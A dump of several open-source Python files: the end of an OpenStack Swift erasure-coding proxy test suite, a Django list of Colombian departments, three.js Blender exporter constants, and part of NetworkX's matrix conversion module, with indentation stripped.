{'obj': obj2, 'frag': 1, 'durable': True},
{'obj': obj2, 'frag': 2, 'durable': True},
{'obj': obj2, 'frag': 3, 'durable': True},
{'obj': obj2, 'frag': 4, 'durable': True},
{'obj': obj2, 'frag': 5, 'durable': True},
{'obj': obj2, 'frag': 6, 'durable': True},
# 7 frags of obj1 are available and durable
{'obj': obj1, 'frag': 7, 'durable': True},
{'obj': obj1, 'frag': 8, 'durable': True},
{'obj': obj1, 'frag': 9, 'durable': True},
{'obj': obj1, 'frag': 10, 'durable': True},
{'obj': obj1, 'frag': 11, 'durable': True},
{'obj': obj1, 'frag': 12, 'durable': True},
{'obj': obj1, 'frag': 13, 'durable': True},
# handoffs
]
node_frags += [[]] * (self.replicas() * 2 - len(node_frags))
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
# read body to provoke any EC decode errors
self.assertFalse(resp.body)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), self.replicas() * 2)
collected_etags = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag) # will be None from handoffs
self.assertEqual({obj1['etag'], obj2['etag'], None}, collected_etags)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertEqual(log_lines,
['Problem with fragment response: ETag mismatch'] * 7)
def _test_determine_chunk_destinations_prioritize(
self, missing_two, missing_one):
# This scenario is only likely for ec_duplication_factor >= 2. If we
# have multiple failures such that the putters collection is missing
# two primary nodes for frag index 'missing_two' and missing one
# primary node for frag index 'missing_one', then we should prioritize
# finding a handoff for frag index 'missing_two'.
class FakePutter(object):
def __init__(self, index):
self.node_index = index
controller = self.controller_cls(self.app, 'a', 'c', 'o')
# sanity, caller must set missing_two < than ec_num_unique_fragments
self.assertLess(missing_two, self.policy.ec_n_unique_fragments)
# create a dummy list of putters, check no handoffs
putters = []
for index in range(self.policy.object_ring.replica_count):
putters.append(FakePutter(index))
# sanity - all putters have primary nodes
got = controller._determine_chunk_destinations(putters, self.policy)
expected = {}
for i, p in enumerate(putters):
expected[p] = self.policy.get_backend_index(i)
self.assertEqual(got, expected)
# now, for fragment index that is missing two copies, lets make one
# putter be a handoff
handoff_putter = putters[missing_two]
handoff_putter.node_index = None
# and then pop another putter for a copy of same fragment index
putters.pop(missing_two + self.policy.ec_n_unique_fragments)
# also pop one copy of a different fragment to make one missing hole
putters.pop(missing_one)
# then determine chunk destinations: we have 26 putters here;
# missing_two frag index is missing two copies; missing_one frag index
# is missing one copy, therefore the handoff node should be assigned to
# missing_two frag index
got = controller._determine_chunk_destinations(putters, self.policy)
# N.B. len(putters) is now len(expected - 2) due to pop twice
self.assertEqual(len(putters), len(got))
# sanity, no node index - for handoff putter
self.assertIsNone(handoff_putter.node_index)
self.assertEqual(got[handoff_putter], missing_two)
# sanity, other nodes except handoff_putter have node_index
self.assertTrue(all(
[putter.node_index is not None for putter in got if
putter != handoff_putter]))
def test_determine_chunk_destinations_prioritize_more_missing(self):
# drop node_index 0, 14 and 1 should work
self._test_determine_chunk_destinations_prioritize(0, 1)
# drop node_index 1, 15 and 0 should work, too
self._test_determine_chunk_destinations_prioritize(1, 0)
class TestNumContainerUpdates(unittest.TestCase):
def test_it(self):
test_cases = [
# (container replicas, object replicas, object quorum, expected)
(3, 17, 13, 6), # EC 12+5
(3, 9, 4, 7), # EC 3+6
(3, 14, 11, 5), # EC 10+4
(5, 14, 11, 6), # EC 10+4, 5 container replicas
(7, 14, 11, 7), # EC 10+4, 7 container replicas
(3, 19, 16, 5), # EC 15+4
(5, 19, 16, 6), # EC 15+4, 5 container replicas
(3, 28, 22, 8), # EC (10+4)x2
(5, 28, 22, 9), # EC (10+4)x2, 5 container replicas
(3, 1, 1, 3), # 1 object replica
(3, 2, 1, 3), # 2 object replicas
(3, 3, 2, 3), # 3 object replicas
(3, 4, 2, 4), # 4 object replicas
(3, 5, 3, 4), # 5 object replicas
(3, 6, 3, 5), # 6 object replicas
(3, 7, 4, 5), # 7 object replicas
]
for c_replica, o_replica, o_quorum, exp in test_cases:
c_quorum = utils.quorum_size(c_replica)
got = obj.num_container_updates(c_replica, c_quorum,
o_replica, o_quorum)
self.assertEqual(
exp, got,
"Failed for c_replica=%d, o_replica=%d, o_quorum=%d" % (
c_replica, o_replica, o_quorum))
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
ProfessionalIT/professionalit-webiste | sdk/google_appengine/lib/django-1.4/django/contrib/localflavor/co/co_departments.py | 90 | 1097 | # -*- coding: utf-8 -*-
"""
A list of Colombian departaments as `choices` in a
formfield.
This exists in this standalone file so that it's only
imported into memory when explicitly needed.
"""
DEPARTMENT_CHOICES = (
('AMA', u'Amazonas'),
('ANT', u'Antioquia'),
('ARA', u'Arauca'),
('ATL', u'Atlántico'),
('DC', u'Bogotá'),
('BOL', u'Bolívar'),
('BOY', u'Boyacá'),
('CAL', u'Caldas'),
('CAQ', u'Caquetá'),
('CAS', u'Casanare'),
('CAU', u'Cauca'),
('CES', u'Cesar'),
('CHO', u'Chocó'),
('COR', u'Córdoba'),
('CUN', u'Cundinamarca'),
('GUA', u'Guainía'),
('GUV', u'Guaviare'),
('HUI', u'Huila'),
('LAG', u'La Guajira'),
('MAG', u'Magdalena'),
('MET', u'Meta'),
('NAR', u'Nariño'),
('NSA', u'Norte de Santander'),
('PUT', u'Putumayo'),
('QUI', u'Quindío'),
('RIS', u'Risaralda'),
('SAP', u'San Andrés and Providencia'),
('SAN', u'Santander'),
('SUC', u'Sucre'),
('TOL', u'Tolima'),
('VAC', u'Valle del Cauca'),
('VAU', u'Vaupés'),
('VID', u'Vichada'),
)
| lgpl-3.0 |
ilovezy/three.js | utils/exporters/blender/addons/io_three/constants.py | 124 | 6852 | '''
All constant data used in the package should be defined here.
'''
from collections import OrderedDict as BASE_DICT
BLENDING_TYPES = type('Blending', (), {
'NONE': 'NoBlending',
'NORMAL': 'NormalBlending',
'ADDITIVE': 'AdditiveBlending',
'SUBTRACTIVE': 'SubtractiveBlending',
'MULTIPLY': 'MultiplyBlending',
'CUSTOM': 'CustomBlending'
})
NEAREST_FILTERS = type('NearestFilters', (), {
'NEAREST': 'NearestFilter',
'MIP_MAP_NEAREST': 'NearestMipMapNearestFilter',
'MIP_MAP_LINEAR': 'NearestMipMapLinearFilter'
})
LINEAR_FILTERS = type('LinearFilters', (), {
'LINEAR': 'LinearFilter',
'MIP_MAP_NEAREST': 'LinearMipMapNearestFilter',
'MIP_MAP_LINEAR': 'LinearMipMapLinearFilter'
})
MAPPING_TYPES = type('Mapping', (), {
'UV': 'UVMapping',
'CUBE_REFLECTION': 'CubeReflectionMapping',
'CUBE_REFRACTION': 'CubeRefractionMapping',
'SPHERICAL_REFLECTION': 'SphericalReflectionMapping'
})
JSON = 'json'
EXTENSION = '.%s' % JSON
INDENT = 'indent'
MATERIALS = 'materials'
SCENE = 'scene'
VERTICES = 'vertices'
FACES = 'faces'
NORMALS = 'normals'
BONES = 'bones'
UVS = 'uvs'
COLORS = 'colors'
MIX_COLORS = 'mixColors'
SCALE = 'scale'
COMPRESSION = 'compression'
MAPS = 'maps'
FRAME_STEP = 'frameStep'
FRAME_INDEX_AS_TIME = 'frameIndexAsTime'
ANIMATION = 'animations'
MORPH_TARGETS = 'morphTargets'
POSE = 'pose'
REST = 'rest'
SKIN_INDICES = 'skinIndices'
SKIN_WEIGHTS = 'skinWeights'
LOGGING = 'logging'
CAMERAS = 'cameras'
LIGHTS = 'lights'
HIERARCHY = 'hierarchy'
FACE_MATERIALS = 'faceMaterials'
SKINNING = 'skinning'
COPY_TEXTURES = 'copyTextures'
TEXTURE_FOLDER = 'textureFolder'
ENABLE_PRECISION = 'enablePrecision'
PRECISION = 'precision'
DEFAULT_PRECISION = 6
EMBED_GEOMETRY = 'embedGeometry'
EMBED_ANIMATION = 'embedAnimation'
OFF = 'off'
GLOBAL = 'global'
BUFFER_GEOMETRY = 'BufferGeometry'
GEOMETRY = 'geometry'
GEOMETRY_TYPE = 'geometryType'
CRITICAL = 'critical'
ERROR = 'error'
WARNING = 'warning'
INFO = 'info'
DEBUG = 'debug'
NONE = 'None'
MSGPACK = 'msgpack'
PACK = 'pack'
INFLUENCES_PER_VERTEX = 'influencesPerVertex'
EXPORT_OPTIONS = {
FACES: True,
VERTICES: True,
NORMALS: True,
UVS: True,
COLORS: False,
MATERIALS: False,
FACE_MATERIALS: False,
SCALE: 1,
FRAME_STEP: 1,
FRAME_INDEX_AS_TIME: False,
SCENE: False,
MIX_COLORS: False,
COMPRESSION: None,
MAPS: False,
ANIMATION: OFF,
BONES: False,
SKINNING: False,
MORPH_TARGETS: False,
CAMERAS: False,
LIGHTS: False,
HIERARCHY: False,
COPY_TEXTURES: True,
TEXTURE_FOLDER: '',
LOGGING: DEBUG,
ENABLE_PRECISION: True,
PRECISION: DEFAULT_PRECISION,
EMBED_GEOMETRY: True,
EMBED_ANIMATION: True,
GEOMETRY_TYPE: GEOMETRY,
INFLUENCES_PER_VERTEX: 2,
INDENT: True
}
FORMAT_VERSION = 4.3
VERSION = 'version'
THREE = 'io_three'
GENERATOR = 'generator'
SOURCE_FILE = 'sourceFile'
VALID_DATA_TYPES = (str, int, float, bool, list, tuple, dict)
JSON = 'json'
GZIP = 'gzip'
EXTENSIONS = {
JSON: '.json',
MSGPACK: '.pack',
GZIP: '.gz'
}
METADATA = 'metadata'
GEOMETRIES = 'geometries'
IMAGES = 'images'
TEXTURE = 'texture'
TEXTURES = 'textures'
USER_DATA = 'userData'
DATA = 'data'
TYPE = 'type'
MATERIAL = 'material'
OBJECT = 'object'
PERSPECTIVE_CAMERA = 'PerspectiveCamera'
ORTHOGRAPHIC_CAMERA = 'OrthographicCamera'
AMBIENT_LIGHT = 'AmbientLight'
DIRECTIONAL_LIGHT = 'DirectionalLight'
AREA_LIGHT = 'AreaLight'
POINT_LIGHT = 'PointLight'
SPOT_LIGHT = 'SpotLight'
HEMISPHERE_LIGHT = 'HemisphereLight'
MESH = 'Mesh'
EMPTY = 'Empty'
SPRITE = 'Sprite'
DEFAULT_METADATA = {
VERSION: FORMAT_VERSION,
TYPE: OBJECT.title(),
GENERATOR: THREE
}
UUID = 'uuid'
MATRIX = 'matrix'
POSITION = 'position'
QUATERNION = 'quaternion'
ROTATION = 'rotation'
SCALE = 'scale'
UV = 'uv'
ATTRIBUTES = 'attributes'
NORMAL = 'normal'
ITEM_SIZE = 'itemSize'
ARRAY = 'array'
FLOAT_32 = 'Float32Array'
VISIBLE = 'visible'
CAST_SHADOW = 'castShadow'
RECEIVE_SHADOW = 'receiveShadow'
QUAD = 'quad'
USER_DATA = 'userData'
MASK = {
QUAD: 0,
MATERIALS: 1,
UVS: 3,
NORMALS: 5,
COLORS: 7
}
CHILDREN = 'children'
URL = 'url'
WRAP = 'wrap'
REPEAT = 'repeat'
WRAPPING = type('Wrapping', (), {
'REPEAT': 'RepeatWrapping',
'CLAMP': 'ClampToEdgeWrapping',
'MIRROR': 'MirroredRepeatWrapping'
})
ANISOTROPY = 'anisotropy'
MAG_FILTER = 'magFilter'
MIN_FILTER = 'minFilter'
MAPPING = 'mapping'
IMAGE = 'image'
NAME = 'name'
PARENT = 'parent'
LENGTH = 'length'
FPS = 'fps'
HIERARCHY = 'hierarchy'
POS = 'pos'
ROTQ = 'rotq'
ROT = 'rot'
SCL = 'scl'
TIME = 'time'
KEYS = 'keys'
AMBIENT = 'ambient'
COLOR = 'color'
EMISSIVE = 'emissive'
SPECULAR = 'specular'
SPECULAR_COEF = 'specularCoef'
SHININESS = 'shininess'
SIDE = 'side'
OPACITY = 'opacity'
TRANSPARENT = 'transparent'
WIREFRAME = 'wireframe'
BLENDING = 'blending'
VERTEX_COLORS = 'vertexColors'
DEPTH_WRITE = 'depthWrite'
DEPTH_TEST = 'depthTest'
MAP = 'map'
SPECULAR_MAP = 'specularMap'
LIGHT_MAP = 'lightMap'
BUMP_MAP = 'bumpMap'
BUMP_SCALE = 'bumpScale'
NORMAL_MAP = 'normalMap'
NORMAL_SCALE = 'normalScale'
#@TODO ENV_MAP, REFLECTIVITY, REFRACTION_RATIO, COMBINE
MAP_DIFFUSE = 'mapDiffuse'
MAP_DIFFUSE_REPEAT = 'mapDiffuseRepeat'
MAP_DIFFUSE_WRAP = 'mapDiffuseWrap'
MAP_DIFFUSE_ANISOTROPY = 'mapDiffuseAnisotropy'
MAP_SPECULAR = 'mapSpecular'
MAP_SPECULAR_REPEAT = 'mapSpecularRepeat'
MAP_SPECULAR_WRAP = 'mapSpecularWrap'
MAP_SPECULAR_ANISOTROPY = 'mapSpecularAnisotropy'
MAP_LIGHT = 'mapLight'
MAP_LIGHT_REPEAT = 'mapLightRepeat'
MAP_LIGHT_WRAP = 'mapLightWrap'
MAP_LIGHT_ANISOTROPY = 'mapLightAnisotropy'
MAP_NORMAL = 'mapNormal'
MAP_NORMAL_FACTOR = 'mapNormalFactor'
MAP_NORMAL_REPEAT = 'mapNormalRepeat'
MAP_NORMAL_WRAP = 'mapNormalWrap'
MAP_NORMAL_ANISOTROPY = 'mapNormalAnisotropy'
MAP_BUMP = 'mapBump'
MAP_BUMP_REPEAT = 'mapBumpRepeat'
MAP_BUMP_WRAP = 'mapBumpWrap'
MAP_BUMP_ANISOTROPY = 'mapBumpAnisotropy'
MAP_BUMP_SCALE = 'mapBumpScale'
NORMAL_BLENDING = 0
VERTEX_COLORS_ON = 2
VERTEX_COLORS_OFF = 0
THREE_BASIC = 'MeshBasicMaterial'
THREE_LAMBERT = 'MeshLambertMaterial'
THREE_PHONG = 'MeshPhongMaterial'
INTENSITY = 'intensity'
DISTANCE = 'distance'
ASPECT = 'aspect'
ANGLE = 'angle'
FOV = 'fov'
ASPECT = 'aspect'
NEAR = 'near'
FAR = 'far'
LEFT = 'left'
RIGHT = 'right'
TOP = 'top'
BOTTOM = 'bottom'
SHADING = 'shading'
COLOR_DIFFUSE = 'colorDiffuse'
COLOR_AMBIENT = 'colorAmbient'
COLOR_EMISSIVE = 'colorEmissive'
COLOR_SPECULAR = 'colorSpecular'
DBG_NAME = 'DbgName'
DBG_COLOR = 'DbgColor'
DBG_INDEX = 'DbgIndex'
EMIT = 'emit'
PHONG = 'phong'
LAMBERT = 'lambert'
BASIC = 'basic'
NORMAL_BLENDING = 'NormalBlending'
DBG_COLORS = (0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee,
0xeeee00, 0x00eeee, 0xee00ee)
DOUBLE_SIDED = 'doubleSided'
EXPORT_SETTINGS_KEY = 'threeExportSettings'
| mit |
JFriel/honours_project | networkx/build/lib/networkx/convert_matrix.py | 10 | 33329 | """Functions to convert NetworkX graphs to and from numpy/scipy matrices.
The preferred way of converting data to a NetworkX graph is through the
graph constuctor. The constructor calls the to_networkx_graph() function
which attempts to guess the input type and convert it automatically.
Examples
--------
Create a 10 node random graph from a numpy matrix
>>> import numpy
>>> a = numpy.reshape(numpy.random.random_integers(0,1,size=100),(10,10))
>>> D = nx.DiGraph(a)
or equivalently
>>> D = nx.to_networkx_graph(a,create_using=nx.DiGraph())
See Also
--------
nx_agraph, nx_pydot
"""
# Copyright (C) 2006-2014 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import warnings
import itertools
import networkx as nx
from networkx.convert import _prep_create_using
from networkx.utils import not_implemented_for
__author__ = """\n""".join(['Aric Hagberg <aric.hagberg@gmail.com>',
'Pieter Swart (swart@lanl.gov)',
'Dan Schult(dschult@colgate.edu)'])
__all__ = ['from_numpy_matrix', 'to_numpy_matrix',
'from_pandas_dataframe', 'to_pandas_dataframe',
'to_numpy_recarray',
'from_scipy_sparse_matrix', 'to_scipy_sparse_matrix']
def to_pandas_dataframe(G, nodelist=None, multigraph_weight=sum, weight='weight', nonedge=0.0):
"""Return the graph adjacency matrix as a Pandas DataFrame.
Parameters
----------
G : graph
The NetworkX graph used to construct the Pandas DataFrame.
nodelist : list, optional
The rows and columns are ordered according to the nodes in `nodelist`.
If `nodelist` is None, then the ordering is produced by G.nodes().
multigraph_weight : {sum, min, max}, optional
An operator that determines how weights in multigraphs are handled.
The default is to sum the weights of the multiple edges.
weight : string or None, optional
The edge attribute that holds the numerical value used for
the edge weight. If an edge does not have that attribute, then the
value 1 is used instead.
nonedge : float, optional
The matrix values corresponding to nonedges are typically set to zero.
However, this could be undesirable if there are matrix values
corresponding to actual edges that also have the value zero. If so,
one might prefer nonedges to have some other value, such as nan.
Returns
-------
df : Pandas DataFrame
Graph adjacency matrix
Notes
-----
The DataFrame entries are assigned to the weight edge attribute. When
an edge does not have a weight attribute, the value of the entry is set to
the number 1. For multiple (parallel) edges, the values of the entries
are determined by the 'multigraph_weight' parameter. The default is to
sum the weight attributes for each of the parallel edges.
When `nodelist` does not contain every node in `G`, the matrix is built
from the subgraph of `G` that is induced by the nodes in `nodelist`.
The convention used for self-loop edges in graphs is to assign the
diagonal matrix entry value to the weight attribute of the edge
(or the number 1 if the edge has no weight attribute). If the
alternate convention of doubling the edge weight is desired the
resulting Pandas DataFrame can be modified as follows:
>>> import pandas as pd
>>> import numpy as np
>>> G = nx.Graph([(1,1)])
>>> df = nx.to_pandas_dataframe(G)
>>> df
1
1 1
>>> df.values[np.diag_indices_from(df)] *= 2
>>> df
1
1 2
Examples
--------
>>> G = nx.MultiDiGraph()
>>> G.add_edge(0,1,weight=2)
>>> G.add_edge(1,0)
>>> G.add_edge(2,2,weight=3)
>>> G.add_edge(2,2)
>>> nx.to_pandas_dataframe(G, nodelist=[0,1,2])
0 1 2
0 0 2 0
1 1 0 0
2 0 0 4
"""
import pandas as pd
M = to_numpy_matrix(G, nodelist, None, None, multigraph_weight, weight, nonedge)
if nodelist is None:
nodelist = G.nodes()
nodeset = set(nodelist)
df = pd.DataFrame(data=M, index = nodelist ,columns = nodelist)
return df
def from_pandas_dataframe(df, source, target, edge_attr=None,
create_using=None):
"""Return a graph from Pandas DataFrame.
The Pandas DataFrame should contain at least two columns of node names and
zero or more columns of node attributes. Each row will be processed as one
edge instance.
Note: This function iterates over DataFrame.values, which is not
guaranteed to retain the data type across columns in the row. This is only
a problem if your row is entirely numeric and a mix of ints and floats. In
that case, all values will be returned as floats. See the
DataFrame.iterrows documentation for an example.
Parameters
----------
df : Pandas DataFrame
An edge list representation of a graph
source : str or int
A valid column name (string or iteger) for the source nodes (for the
directed case).
target : str or int
A valid column name (string or iteger) for the target nodes (for the
directed case).
edge_attr : str or int, iterable, True
A valid column name (str or integer) or list of column names that will
be used to retrieve items from the row and add them to the graph as edge
attributes. If `True`, all of the remaining columns will be added.
create_using : NetworkX graph
Use specified graph for result. The default is Graph()
See Also
--------
to_pandas_dataframe
Examples
--------
Simple integer weights on edges:
>>> import pandas as pd
>>> import numpy as np
>>> r = np.random.RandomState(seed=5)
>>> ints = r.random_integers(1, 10, size=(3,2))
>>> a = ['A', 'B', 'C']
>>> b = ['D', 'A', 'E']
>>> df = pd.DataFrame(ints, columns=['weight', 'cost'])
>>> df[0] = a
>>> df['b'] = b
>>> df
weight cost 0 b
0 4 7 A D
1 7 1 B A
2 10 9 C E
>>> G=nx.from_pandas_dataframe(df, 0, 'b', ['weight', 'cost'])
>>> G['E']['C']['weight']
10
>>> G['E']['C']['cost']
9
"""
g = _prep_create_using(create_using)
# Index of source and target
src_i = df.columns.get_loc(source)
tar_i = df.columns.get_loc(target)
if edge_attr:
# If all additional columns requested, build up a list of tuples
# [(name, index),...]
if edge_attr is True:
# Create a list of all columns indices, ignore nodes
edge_i = []
for i, col in enumerate(df.columns):
if col is not source and col is not target:
edge_i.append((col, i))
# If a list or tuple of name is requested
elif isinstance(edge_attr, (list, tuple)):
edge_i = [(i, df.columns.get_loc(i)) for i in edge_attr]
# If a string or int is passed
else:
edge_i = [(edge_attr, df.columns.get_loc(edge_attr)),]
# Iteration on values returns the rows as Numpy arrays
for row in df.values:
g.add_edge(row[src_i], row[tar_i], {i:row[j] for i, j in edge_i})
# If no column names are given, then just return the edges.
else:
for row in df.values:
g.add_edge(row[src_i], row[tar_i])
return g
def to_numpy_matrix(G, nodelist=None, dtype=None, order=None,
multigraph_weight=sum, weight='weight', nonedge=0.0):
"""Return the graph adjacency matrix as a NumPy matrix.
Parameters
----------
G : graph
The NetworkX graph used to construct the NumPy matrix.
nodelist : list, optional
The rows and columns are ordered according to the nodes in ``nodelist``.
If ``nodelist`` is None, then the ordering is produced by G.nodes().
dtype : NumPy data type, optional
A valid single NumPy data type used to initialize the array.
This must be a simple type such as int or numpy.float64 and
not a compound data type (see to_numpy_recarray)
If None, then the NumPy default is used.
order : {'C', 'F'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. If None, then the NumPy default
is used.
multigraph_weight : {sum, min, max}, optional
An operator that determines how weights in multigraphs are handled.
The default is to sum the weights of the multiple edges.
weight : string or None optional (default = 'weight')
The edge attribute that holds the numerical value used for
the edge weight. If an edge does not have that attribute, then the
value 1 is used instead.
nonedge : float (default = 0.0)
The matrix values corresponding to nonedges are typically set to zero.
However, this could be undesirable if there are matrix values
corresponding to actual edges that also have the value zero. If so,
one might prefer nonedges to have some other value, such as nan.
Returns
-------
M : NumPy matrix
Graph adjacency matrix
See Also
--------
to_numpy_recarray, from_numpy_matrix
Notes
-----
The matrix entries are assigned to the weight edge attribute. When
an edge does not have a weight attribute, the value of the entry is set to
the number 1. For multiple (parallel) edges, the values of the entries
are determined by the ``multigraph_weight`` parameter. The default is to
sum the weight attributes for each of the parallel edges.
When ``nodelist`` does not contain every node in ``G``, the matrix is built
from the subgraph of ``G`` that is induced by the nodes in ``nodelist``.
The convention used for self-loop edges in graphs is to assign the
diagonal matrix entry value to the weight attribute of the edge
(or the number 1 if the edge has no weight attribute). If the
alternate convention of doubling the edge weight is desired the
resulting Numpy matrix can be modified as follows:
>>> import numpy as np
>>> G = nx.Graph([(1, 1)])
>>> A = nx.to_numpy_matrix(G)
>>> A
matrix([[ 1.]])
>>> A.A[np.diag_indices_from(A)] *= 2
>>> A
matrix([[ 2.]])
Examples
--------
>>> G = nx.MultiDiGraph()
>>> G.add_edge(0,1,weight=2)
>>> G.add_edge(1,0)
>>> G.add_edge(2,2,weight=3)
>>> G.add_edge(2,2)
>>> nx.to_numpy_matrix(G, nodelist=[0,1,2])
matrix([[ 0., 2., 0.],
[ 1., 0., 0.],
[ 0., 0., 4.]])
"""
import numpy as np
if nodelist is None:
nodelist = G.nodes()
nodeset = set(nodelist)
if len(nodelist) != len(nodeset):
msg = "Ambiguous ordering: `nodelist` contained duplicates."
raise nx.NetworkXError(msg)
nlen=len(nodelist)
undirected = not G.is_directed()
index=dict(zip(nodelist,range(nlen)))
# Initially, we start with an array of nans. Then we populate the matrix
# using data from the graph. Afterwards, any leftover nans will be
# converted to the value of `nonedge`. Note, we use nans initially,
# instead of zero, for two reasons:
#
# 1) It can be important to distinguish a real edge with the value 0
# from a nonedge with the value 0.
#
# 2) When working with multi(di)graphs, we must combine the values of all
# edges between any two nodes in some manner. This often takes the
# form of a sum, min, or max. Using the value 0 for a nonedge would
# have undesirable effects with min and max, but using nanmin and
# nanmax with initially nan values is not problematic at all.
#
# That said, there are still some drawbacks to this approach. Namely, if
# a real edge is nan, then that value is a) not distinguishable from
# nonedges and b) is ignored by the default combinator (nansum, nanmin,
# nanmax) functions used for multi(di)graphs. If this becomes an issue,
# an alternative approach is to use masked arrays. Initially, every
# element is masked and set to some `initial` value. As we populate the
# graph, elements are unmasked (automatically) when we combine the initial
# value with the values given by real edges. At the end, we convert all
# masked values to `nonedge`. Using masked arrays fully addresses reason 1,
# but for reason 2, we would still have the issue with min and max if the
# initial values were 0.0. Note: an initial value of +inf is appropriate
# for min, while an initial value of -inf is appropriate for max. When
# working with sum, an initial value of zero is appropriate. Ideally then,
# we'd want to allow users to specify both a value for nonedges and also
# an initial value. For multi(di)graphs, the choice of the initial value
# will, in general, depend on the combinator function---sensible defaults
# can be provided.
if G.is_multigraph():
# Handle MultiGraphs and MultiDiGraphs
M = np.zeros((nlen, nlen), dtype=dtype, order=order) + np.nan
# use numpy nan-aware operations
operator={sum:np.nansum, min:np.nanmin, max:np.nanmax}
try:
op=operator[multigraph_weight]
except:
raise ValueError('multigraph_weight must be sum, min, or max')
for u,v,attrs in G.edges_iter(data=True):
if (u in nodeset) and (v in nodeset):
i, j = index[u], index[v]
e_weight = attrs.get(weight, 1)
M[i,j] = op([e_weight, M[i,j]])
if undirected:
M[j,i] = M[i,j]
else:
# Graph or DiGraph, this is much faster than above
M = np.zeros((nlen,nlen), dtype=dtype, order=order) + np.nan
for u,nbrdict in G.adjacency_iter():
for v,d in nbrdict.items():
try:
M[index[u],index[v]] = d.get(weight,1)
except KeyError:
# This occurs when there are fewer desired nodes than
# there are nodes in the graph: len(nodelist) < len(G)
pass
M[np.isnan(M)] = nonedge
M = np.asmatrix(M)
return M
def from_numpy_matrix(A, parallel_edges=False, create_using=None):
"""Return a graph from numpy matrix.
The numpy matrix is interpreted as an adjacency matrix for the graph.
Parameters
----------
A : numpy matrix
An adjacency matrix representation of a graph
parallel_edges : Boolean
If this is ``True``, ``create_using`` is a multigraph, and ``A`` is an
integer matrix, then entry *(i, j)* in the matrix is interpreted as the
number of parallel edges joining vertices *i* and *j* in the graph. If it
is ``False``, then the entries in the adjacency matrix are interpreted as
the weight of a single edge joining the vertices.
create_using : NetworkX graph
Use specified graph for result. The default is Graph()
Notes
-----
If ``create_using`` is an instance of :class:`networkx.MultiGraph` or
:class:`networkx.MultiDiGraph`, ``parallel_edges`` is ``True``, and the
entries of ``A`` are of type ``int``, then this function returns a multigraph
(of the same type as ``create_using``) with parallel edges.
If ``create_using`` is an undirected multigraph, then only the edges
indicated by the upper triangle of the matrix `A` will be added to the
graph.
If the numpy matrix has a single data type for each matrix entry it
will be converted to an appropriate Python data type.
If the numpy matrix has a user-specified compound data type the names
of the data fields will be used as attribute keys in the resulting
NetworkX graph.
See Also
--------
to_numpy_matrix, to_numpy_recarray
Examples
--------
Simple integer weights on edges:
>>> import numpy
>>> A=numpy.matrix([[1, 1], [2, 1]])
>>> G=nx.from_numpy_matrix(A)
If ``create_using`` is a multigraph and the matrix has only integer entries,
the entries will be interpreted as weighted edges joining the vertices
(without creating parallel edges):
>>> import numpy
>>> A = numpy.matrix([[1, 1], [1, 2]])
>>> G = nx.from_numpy_matrix(A, create_using = nx.MultiGraph())
>>> G[1][1]
{0: {'weight': 2}}
If ``create_using`` is a multigraph and the matrix has only integer entries
but ``parallel_edges`` is ``True``, then the entries will be interpreted as
the number of parallel edges joining those two vertices:
>>> import numpy
>>> A = numpy.matrix([[1, 1], [1, 2]])
>>> temp = nx.MultiGraph()
>>> G = nx.from_numpy_matrix(A, parallel_edges = True, create_using = temp)
>>> G[1][1]
{0: {'weight': 1}, 1: {'weight': 1}}
User defined compound data type on edges:
>>> import numpy
>>> dt = [('weight', float), ('cost', int)]
>>> A = numpy.matrix([[(1.0, 2)]], dtype = dt)
>>> G = nx.from_numpy_matrix(A)
>>> G.edges()
[(0, 0)]
>>> G[0][0]['cost']
2
>>> G[0][0]['weight']
1.0
"""
# This should never fail if you have created a numpy matrix with numpy...
import numpy as np
kind_to_python_type={'f':float,
'i':int,
'u':int,
'b':bool,
'c':complex,
'S':str,
'V':'void'}
try: # Python 3.x
blurb = chr(1245) # just to trigger the exception
kind_to_python_type['U']=str
except ValueError: # Python 2.6+
kind_to_python_type['U']=unicode
G=_prep_create_using(create_using)
n,m=A.shape
if n!=m:
raise nx.NetworkXError("Adjacency matrix is not square.",
"nx,ny=%s"%(A.shape,))
dt=A.dtype
try:
python_type=kind_to_python_type[dt.kind]
except:
raise TypeError("Unknown numpy data type: %s"%dt)
# Make sure we get even the isolated nodes of the graph.
G.add_nodes_from(range(n))
# Get a list of all the entries in the matrix with nonzero entries. These
# coordinates will become the edges in the graph.
edges = zip(*(np.asarray(A).nonzero()))
# handle numpy constructed data type
if python_type is 'void':
# Sort the fields by their offset, then by dtype, then by name.
fields = sorted((offset, dtype, name) for name, (dtype, offset) in
A.dtype.fields.items())
triples = ((u, v, {name: kind_to_python_type[dtype.kind](val)
for (_, dtype, name), val in zip(fields, A[u, v])})
for u, v in edges)
# If the entries in the adjacency matrix are integers, the graph is a
# multigraph, and parallel_edges is True, then create parallel edges, each
# with weight 1, for each entry in the adjacency matrix. Otherwise, create
# one edge for each positive entry in the adjacency matrix and set the
# weight of that edge to be the entry in the matrix.
elif python_type is int and G.is_multigraph() and parallel_edges:
chain = itertools.chain.from_iterable
# The following line is equivalent to:
#
# for (u, v) in edges:
# for d in range(A[u, v]):
# G.add_edge(u, v, weight=1)
#
triples = chain(((u, v, dict(weight=1)) for d in range(A[u, v]))
for (u, v) in edges)
else: # basic data type
triples = ((u, v, dict(weight=python_type(A[u, v])))
for u, v in edges)
# If we are creating an undirected multigraph, only add the edges from the
# upper triangle of the matrix. Otherwise, add all the edges. This relies
# on the fact that the vertices created in the
# ``_generated_weighted_edges()`` function are actually the row/column
# indices for the matrix ``A``.
#
# Without this check, we run into a problem where each edge is added twice
# when ``G.add_edges_from()`` is invoked below.
if G.is_multigraph() and not G.is_directed():
triples = ((u, v, d) for u, v, d in triples if u <= v)
G.add_edges_from(triples)
return G
@not_implemented_for('multigraph')
def to_numpy_recarray(G,nodelist=None,
dtype=[('weight',float)],
order=None):
"""Return the graph adjacency matrix as a NumPy recarray.
Parameters
----------
G : graph
The NetworkX graph used to construct the NumPy matrix.
nodelist : list, optional
The rows and columns are ordered according to the nodes in `nodelist`.
